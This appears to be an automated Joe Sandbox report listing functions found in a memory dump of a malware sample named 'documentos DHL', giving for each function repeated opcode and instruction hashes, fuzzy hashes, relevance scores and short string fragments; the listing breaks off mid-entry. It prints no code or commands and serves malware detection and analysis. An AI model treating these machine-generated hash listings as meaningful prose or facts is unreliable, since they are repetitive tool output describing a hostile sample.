Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 1f7fd9c40b3149cc9503eccaea423cea1c2e5bc6b5b9452258de0893c95dab91
Instruction ID: 35cae3ee9e671ce43693e179ecd36f7ba6e6c5207cfbcbeffd93e264bd3bb48e
Opcode Fuzzy Hash: 1f7fd9c40b3149cc9503eccaea423cea1c2e5bc6b5b9452258de0893c95dab91
Instruction Fuzzy Hash: 26819A87E3F71689E3B3A03185823A25399CF275D1F66CB5A5C2772CA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370A62 Relevance: 4.1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 064dab38931e676ff9ca4b1f89aa69ac0a420ce0146b35003f0c0b1016a1d656
Instruction ID: 9a6576d5f032d841f6a9e45d78db33a1a306c8499d99657e3610de05905c1661
Opcode Fuzzy Hash: 064dab38931e676ff9ca4b1f89aa69ac0a420ce0146b35003f0c0b1016a1d656
Instruction Fuzzy Hash: 57A1AD47E3F70689E3B3A03186813A25788CF275D2F65CB5A5C3772CA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337139F Relevance: 4.1, Strings: 3, Instructions: 386COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: b7a615c68895765f86f0fb3557b396e5a7daddf546df13745501aa889003e67c
Instruction ID: eeb57c7060eb2c735e35f17285239487f1e12ada55d86776fd22d0dc532c3f8a
Opcode Fuzzy Hash: b7a615c68895765f86f0fb3557b396e5a7daddf546df13745501aa889003e67c
Instruction Fuzzy Hash: C971EC47E3A31684D37EE07C8DD93B2E2B98F13592F9C875A5C26328B5B70D46CA51C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370AC6 Relevance: 4.1, Strings: 3, Instructions: 384COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 653fc9a870d5f5321d290939a8a06e9e18242a71b053d6f19806d7e334e2e3ef
Instruction ID: c3341dd6ff9cbaf388bbb502ae468a936a59dfe68c5148cbde449124b7fcf20d
Opcode Fuzzy Hash: 653fc9a870d5f5321d290939a8a06e9e18242a71b053d6f19806d7e334e2e3ef
Instruction Fuzzy Hash: 8EA1BD87E3F70689E7B3B03082C23A26798DF275D1F55CB5A5C2672DA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370C19 Relevance: 4.1, Strings: 3, Instructions: 360COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: d9a907490d946e431c64f68c635fd3fdf33c524e85b1184468ef86dd185ee13d
Instruction ID: 63181305b80873479bfb0f6384378598ea3fd3df05f3abcbbf2b27e51f72b84e
Opcode Fuzzy Hash: d9a907490d946e431c64f68c635fd3fdf33c524e85b1184468ef86dd185ee13d
Instruction Fuzzy Hash: 6A91BC87E3F70689E7B3B03182813A25398CF275D2F65CB5A5C2772DA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370D50 Relevance: 4.1, Strings: 3, Instructions: 352COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 67438c037740ec80eb509c546c444273c1596f10c5e0fd7c28e90eced0e5f4da
Instruction ID: 82acad16130818fde058d6e3e26849b4141a413427d8a0a57fdd6228d4b924e0
Opcode Fuzzy Hash: 67438c037740ec80eb509c546c444273c1596f10c5e0fd7c28e90eced0e5f4da
Instruction Fuzzy Hash: D191BD47E3F70689E3B3A03185823A25399CF275D1F65CB5A5C2772CA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370D92 Relevance: 4.1, Strings: 3, Instructions: 352COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: c8b68610164918013949ce190e148a8bee2542500cc2b7c52f8beac28e103154
Instruction ID: ec25abcc0dce947009f4c8491a4d5c9744ff430ca34cd28765ef128b5a1e6850
Opcode Fuzzy Hash: c8b68610164918013949ce190e148a8bee2542500cc2b7c52f8beac28e103154
Instruction Fuzzy Hash: E791BB47E3F70689E3B3A03085C23A26399DF275D1F65CB5A9C2772CA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370CDC Relevance: 4.1, Strings: 3, Instructions: 349COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: cb3daee552784ba6ca5e1565006d1ce3a44a87f8483209b87bfb5ea0d85d0f46
Instruction ID: 4c35237634b3297244bbf7843ddf5b51c5fe37cfdbae1262928f9504f166f5d7
Opcode Fuzzy Hash: cb3daee552784ba6ca5e1565006d1ce3a44a87f8483209b87bfb5ea0d85d0f46
Instruction Fuzzy Hash: A091BA47E3F71689E3B3A03086823A25798CF275D1F65CB5B5C2772DA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03371150 Relevance: 4.1, Strings: 3, Instructions: 333COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 50f65a79d581c33f7313a87d3a909b92d7e4d07cb75e453e52f8a5444040d45f
Instruction ID: adc2887f6767e6255b95c8ae208e7fb7826d9458c5b53a55927b724f1fdedcd9
Opcode Fuzzy Hash: 50f65a79d581c33f7313a87d3a909b92d7e4d07cb75e453e52f8a5444040d45f
Instruction Fuzzy Hash: EB619E47E3E70689E3B7A03186D23E21399CF235E2F65CB5A5C2772C95B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370E7C Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: fc2d7965d3222ceee7c98e1588081437dc839cc1fdf4caccf50fde1a9f0fa691
Instruction ID: cd8a61a049aab5cbfb0b98f2fae4d8299d220f3bf172c0e61c5e998271bc0932
Opcode Fuzzy Hash: fc2d7965d3222ceee7c98e1588081437dc839cc1fdf4caccf50fde1a9f0fa691
Instruction Fuzzy Hash: 0F819D47E3F71689E3B3A03185C23A25399CF275D1F65CB5A9C2772CA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03371267 Relevance: 4.1, Strings: 3, Instructions: 326COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: aa74f81defd670db3596f61da95d94bb8f57a71e0b8394dfdaa791de5c923581
Instruction ID: 4eecfe217c888150236325d37ca0419b1a864d1f05c2ccc447fb952c73e9ca1d
Opcode Fuzzy Hash: aa74f81defd670db3596f61da95d94bb8f57a71e0b8394dfdaa791de5c923581
Instruction Fuzzy Hash: 3B51C047E3E30699E3B7E03585D13E22389CF236E2F65C7565C2732C91B70E4A8915C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370EFD Relevance: 4.1, Strings: 3, Instructions: 309COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 05cef58a1f6d1a94cd4762febc49a70386b5742251decc678f5ceb34f10bc019
Instruction ID: 4beffc6dfb419a75c59f002bb1d8579e1d46689db4a2687815af587ce7f47f19
Opcode Fuzzy Hash: 05cef58a1f6d1a94cd4762febc49a70386b5742251decc678f5ceb34f10bc019
Instruction Fuzzy Hash: 6C819D47E3F71689E7B3A03185C23A26399CF275D1F65CB5A5C2732C95B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370F5A Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: dde100a429a7719a5d033afc350e5315042fe0e68144cc50ab11e1662abad4f3
Instruction ID: f4360c92391905d67bfa660c5b2cc9cd95188bde4718a8da68fae2602ac9ce84
Opcode Fuzzy Hash: dde100a429a7719a5d033afc350e5315042fe0e68144cc50ab11e1662abad4f3
Instruction Fuzzy Hash: 4C818C47E3F30689E7B3A03186C23A26399CF275D1F65CB5A5C2732C95B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033712DD Relevance: 4.0, Strings: 3, Instructions: 295COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 548a5598d8e421b9ff2573f2d0c2215176ca9de11be96382836d47782200179c
Instruction ID: 81d7393d6c9329daf194fd57b566a3291c86d3cae9f26272e264e017dbd23ac8
Opcode Fuzzy Hash: 548a5598d8e421b9ff2573f2d0c2215176ca9de11be96382836d47782200179c
Instruction Fuzzy Hash: 5E51AE47E3E30695E7B7A03585D23E22389CF235E2F65C75A5C2732C95B70E4AC915C8

Uniqueness

Uniqueness Score: -1.00%

Function 033717D6 Relevance: 4.0, Strings: 3, Instructions: 291COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 7969c91a21c669dfe3a61cccad7007dcaf834ad2958756310943016b88ee3ab6
Instruction ID: a963d0353dba1fa60972a5c96e9088bdd33208469935afb79eadcca03966d225
Opcode Fuzzy Hash: 7969c91a21c669dfe3a61cccad7007dcaf834ad2958756310943016b88ee3ab6
Instruction Fuzzy Hash: EE518C5BF3931A75E3BAD0A58DE23FE5289CF033A3F6C835B4C7626485A70E844925C4

Uniqueness

Uniqueness Score: -1.00%

Function 033770A6 Relevance: 4.0, Strings: 3, Instructions: 291COMMON

Download Yara Rule

Strings

a*NQ, xrefs: 033770EF
[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 1f6ea5968129dcede9cf989b76af2bdd7177cd1592d40e4f5b9ea835f0f6fa1d
Instruction ID: f9e8b05b43528b0452403f5401947788c72f13038fd3281c43ada5cdffe1d079
Opcode Fuzzy Hash: 1f6ea5968129dcede9cf989b76af2bdd7177cd1592d40e4f5b9ea835f0f6fa1d
Instruction Fuzzy Hash: E1B10075604349CFCB34CF29CCE93EA37A6EF56350F94812ACC9D8B212D3395A468B52

Uniqueness

Uniqueness Score: -1.00%

Function 03377038 Relevance: 4.0, Strings: 3, Instructions: 285COMMON

Download Yara Rule

Strings

a*NQ, xrefs: 033770EF
[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 06294c41db3fa6d08bb3ffa7e69d61ae5a60c2515c342a069e3da0da0aebbd0c
Instruction ID: 6ade70c25a8e50f06f988f062a5520b32be57a6567106a00deb3d2124bc37997
Opcode Fuzzy Hash: 06294c41db3fa6d08bb3ffa7e69d61ae5a60c2515c342a069e3da0da0aebbd0c
Instruction Fuzzy Hash: C1B11375204789CFCB71CF68CCA93EA37A6EF15350F94812ECC998B616C3395686CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03376FEF Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

a*NQ, xrefs: 033770EF
[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 0b6671377fa48d37486f88efdd4f6b64f890fd9a758851a97d05ecfdc75cccdd
Instruction ID: 1ca4a71c5d9ef1ad0c7797b9bd773ab669e2011c24ea8d2179127046222f0345
Opcode Fuzzy Hash: 0b6671377fa48d37486f88efdd4f6b64f890fd9a758851a97d05ecfdc75cccdd
Instruction Fuzzy Hash: F0B1F475204789CFCB74CF28CCE93EA37B6EF55350F84812ACC998B615D3355A868B52

Uniqueness

Uniqueness Score: -1.00%

Function 03371416 Relevance: 4.0, Strings: 3, Instructions: 266COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 2e8ecee598d8399f943b6ac0cd15ae50d72dcfcd752d820a7d720cadddaded2b
Instruction ID: 8a556f9d1b25fd8f0c367ca177d5174acd1b95e4789a4ea75f37cd3fe7804db0
Opcode Fuzzy Hash: 2e8ecee598d8399f943b6ac0cd15ae50d72dcfcd752d820a7d720cadddaded2b
Instruction Fuzzy Hash: 9251CC47E3E30A89E7B7A03485D23E22399CF232E1F65C75A5C7732C91B70E458A15C9

Uniqueness

Uniqueness Score: -1.00%

Function 03377124 Relevance: 4.0, Strings: 3, Instructions: 263COMMON

Download Yara Rule

Strings

a*NQ, xrefs: 033770EF
[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 1b3eeb33875a8b359c40c57ce18f28e0d8b79d73afbd31a27bf85ac6de0d3f9d
Instruction ID: 68b06735d6a698916c4a68f4ed53825ee6381ef31872392284a30297c940839b
Opcode Fuzzy Hash: 1b3eeb33875a8b359c40c57ce18f28e0d8b79d73afbd31a27bf85ac6de0d3f9d
Instruction Fuzzy Hash: 11B10475108789CBCB71DF68CCA93EA37B6EF15350F84812ECC998B616C3395686CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03371670 Relevance: 4.0, Strings: 3, Instructions: 257COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: eeead88aa97b2cf1adc7bb9c4425e9e3fd0d7774e35dbd783675ecc2bb57a94a
Instruction ID: 2dcb4b1a595bede7ecda90a75c61acdcf37823b31bf3d4ae145576d09bc16668
Opcode Fuzzy Hash: eeead88aa97b2cf1adc7bb9c4425e9e3fd0d7774e35dbd783675ecc2bb57a94a
Instruction Fuzzy Hash: 8941BA4BE3E30A85E3B6A07485D23E2239DCF172E1F54C72A1D67228D1BB0E858E64C5

Uniqueness

Uniqueness Score: -1.00%

Function 0337133E Relevance: 4.0, Strings: 3, Instructions: 249COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 957ba6f9972be85e6d47ca921593a4abc9f5a702f3e71847ba77311a0e07b589
Instruction ID: f1de373b200b3fdf5131bddba88d0b5f0a89a980e9d12264f81920f3d45c3a00
Opcode Fuzzy Hash: 957ba6f9972be85e6d47ca921593a4abc9f5a702f3e71847ba77311a0e07b589
Instruction Fuzzy Hash: 6F519B47E3E30A99E377A03585D23E22399CF235E1F65C75A5C3732C95B70E4A8A15C8

Uniqueness

Uniqueness Score: -1.00%

Function 03377027 Relevance: 4.0, Strings: 3, Instructions: 249COMMON

Download Yara Rule

Strings

a*NQ, xrefs: 033770EF
[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 524925ffe78d0026882d50c08c55a6b73f613dd344f7172c8f2b42fed50fda21
Instruction ID: 362090092efa1fcb45e92d74b78acf2c0f52511d481e9d1d7dcc7f7578099400
Opcode Fuzzy Hash: 524925ffe78d0026882d50c08c55a6b73f613dd344f7172c8f2b42fed50fda21
Instruction Fuzzy Hash: CEA1CF7520434ACBDF74CF68CCE93EA37A6EF55350F94812ACC9D8B215D3394A868B12

Uniqueness

Uniqueness Score: -1.00%

Function 03371760 Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 06a722ff8d21c1ba0d6f1107f0b9f8ca6621fc0908af039885d9d73567474a16
Instruction ID: 607c39c0d2cfff2a1d239790a1754ae1fd851c3691c6ac5c4a8110e2bfe8a9da
Opcode Fuzzy Hash: 06a722ff8d21c1ba0d6f1107f0b9f8ca6621fc0908af039885d9d73567474a16
Instruction Fuzzy Hash: 6741DE5BE2E30A95E3BAE03446E23F223C9CF132A0F54872A4D67638D1F70E448D65C5

Uniqueness

Uniqueness Score: -1.00%

Function 033714B7 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: f52425b8b9c0cba7e58d2d8c97a253c6a5495a4e07bf431180449fef4f21aebd
Instruction ID: 0be21302adbb4642d66686f7a02acd1beceec102df96b6a2ef87ef50b76bd2f5
Opcode Fuzzy Hash: f52425b8b9c0cba7e58d2d8c97a253c6a5495a4e07bf431180449fef4f21aebd
Instruction Fuzzy Hash: 7351CE4BE3E30689E3B7A03485D23E22399CF272A1F64C75A5C6732C95B70E85CE15C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D5D Relevance: 4.0, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: ff9c5aea474cced4dfbf74d98c7ae9a6eaeac96a50879a3852e511aabe113112
Instruction ID: 6a6973e8fa13fc05366cfd4ed5dbf25b990f628025bbeaccf4bd0f39d783cc14
Opcode Fuzzy Hash: ff9c5aea474cced4dfbf74d98c7ae9a6eaeac96a50879a3852e511aabe113112
Instruction Fuzzy Hash: 1D51140AE2F709D4E376E034C1E27F3678DDF062A1F548F1988A7A2DA5BB1E054967C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372EAF Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: b61e0d07031f5d48d53c259cdccb9e6cbf0a70244579b1c401b30c2081ad42a3
Instruction ID: 1ceb7a91d248bbb68abe7dd37baaf32cda647427c5b28fa4f6bf6a86c3356137
Opcode Fuzzy Hash: b61e0d07031f5d48d53c259cdccb9e6cbf0a70244579b1c401b30c2081ad42a3
Instruction Fuzzy Hash: 9641AF4EE1B30A95E376B034C5D23F62789DF062F1F64871A8C6762DD4BF1E094966C4

Uniqueness

Uniqueness Score: -1.00%

Function 033715E9 Relevance: 3.9, Strings: 3, Instructions: 195COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 19834963668696b0fd1d5b99087045ac2b5699dba39b171d722de1dc295c21cb
Instruction ID: 102ed2c98eafae1ef5dc6b494e0885522c68f8600cae1729b03b95f12684e3fb
Opcode Fuzzy Hash: 19834963668696b0fd1d5b99087045ac2b5699dba39b171d722de1dc295c21cb
Instruction Fuzzy Hash: C541EE5BE2E30A89E3B6A03885D23E363D9CF132A0F54C71A5C6272881F70E458E64C4

Uniqueness

Uniqueness Score: -1.00%

Function 03371566 Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 72afb48ab0067f207cdba937389e1161c96d470ae072081c9a3b6e0f60c49670
Instruction ID: 231a83c1bd825b35c556b5a36b8efc0649db9f1c99529fa042f7790e60152edb
Opcode Fuzzy Hash: 72afb48ab0067f207cdba937389e1161c96d470ae072081c9a3b6e0f60c49670
Instruction Fuzzy Hash: C441BB4BE3E30689E3B6A03485D23F22399CF172A1F64C75A9C6722895BB0E458E54C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D4B Relevance: 3.9, Strings: 3, Instructions: 186COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 22ce51ee0638712dce75b790819356140b05559ef7b174ede8d417326bea26ea
Instruction ID: 8af82724b4ea3f535c85d87b05a7731323d729205bb6f67c5e11ac28a8453ecc
Opcode Fuzzy Hash: 22ce51ee0638712dce75b790819356140b05559ef7b174ede8d417326bea26ea
Instruction Fuzzy Hash: 0351CD0AE2A309D5D376E034C1D27F3274CCF062A1F548F1A8877A2D95AB1E094967C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372F0E Relevance: 3.9, Strings: 3, Instructions: 183COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 016bb693e2a700f685e6bb0c7548950f8ad91c2be5c0791a9b03a8ddcd570941
Instruction ID: 4ade245a66e6091c9232ae21b65b60808baf4157306bd2dbe16bf3b0bc9fc552
